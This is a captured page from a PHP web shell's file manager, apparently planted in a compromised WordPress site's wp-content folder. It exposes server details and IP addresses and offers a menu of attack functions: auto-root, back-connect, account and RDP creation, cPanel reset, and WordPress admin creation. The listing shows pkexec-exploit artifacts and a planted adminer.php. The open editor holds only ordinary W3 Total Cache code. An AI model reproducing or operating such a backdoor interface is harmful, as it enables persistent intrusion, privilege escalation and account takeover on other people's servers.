Linux host56.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 198.54.126.10 | : 216.73.216.62
Cant Read [ /etc/named.conf ]
8.1.33
vaideehi
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
vaideehi /
public_html /
wp-content /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
cache
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
themes
[ DIR ]
drwxr-xr-x
upgrade
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxr-xr-x
w3tc-config
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
advanced-cache.php
1.16
KB
-rw-r--r--
db.php
2.18
KB
-rw-r--r--
index.php
28
B
-r--r--r--
object-cache.php
7.04
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : db.php
<?php /** * W3 Total Cache Database module */ if ( ! defined( 'ABSPATH' ) ) { die(); } if ( ! defined( 'W3TC_DIR' ) ) { define( 'W3TC_DIR', ( defined( 'WP_PLUGIN_DIR' ) ? WP_PLUGIN_DIR : WP_CONTENT_DIR . '/plugins' ) . '/w3-total-cache' ); } /** * Abort W3TC loading if WordPress is upgrading */ if ( ! @is_dir( W3TC_DIR ) || ! file_exists( W3TC_DIR . '/w3-total-cache-api.php' ) ) { if ( ! defined( 'WP_ADMIN' ) ) { global $wp_version; // lets don't show error on front end. if ( version_compare( $wp_version, '6.1-beta1', '>=' ) ) { require_once ABSPATH . WPINC . '/class-wpdb.php'; } else { require_once ABSPATH . WPINC . '/wp-db.php'; } } else { echo wp_kses( sprintf( // translators: 1 opening HTML strong tag, 2 closing HTML strong tag, 3 opening HTML strong tag, // translators: 4 file path, 5 closing HTML strong tag, 6 HTML line break. __( '%1$sW3 Total Cache Error:%2$s some files appear to be missing or out of place. Please re-install plugin or remove %3$s%4$s%5$s. %6$s', 'w3-total-cache' ), '<strong>', '</strong>', '<strong>', '</strong>', __FILE__, '<br />' ), array( 'strong' => array(), 'br' => array(), ) ); } } else { require_once W3TC_DIR . '/w3-total-cache-api.php'; // no caching during activation. $is_installing = ( defined( 'WP_INSTALLING' ) && WP_INSTALLING ); $config = \W3TC\Dispatcher::config(); if ( ( ! $is_installing && $config->get_boolean( 'dbcache.enabled' ) ) || \W3TC\Util_Environment::is_dbcluster( $config ) ) { if ( defined( 'DB_TYPE' ) ) { $db_driver_path = sprintf( '%s/Db/%s.php', W3TC_LIB_DIR, DB_TYPE ); if ( file_exists( $db_driver_path ) ) { require_once $db_driver_path; } else { die( wp_kses( sprintf( // translators: 1 opening HTML strong tag, 2 closing HTML strong tag, 3 database driver file path. __( '%1$sW3 Total Cache Error:%2$s database driver doesn\'t exist: %3$s.', 'w3-total-cache' ), '<strong>', '</strong>', esc_html( $db_driver_path ) ), array( 'strong' => array() ) ) ); } } $GLOBALS['wpdb'] = \W3TC\DbCache_Wpdb::instance(); } }
Close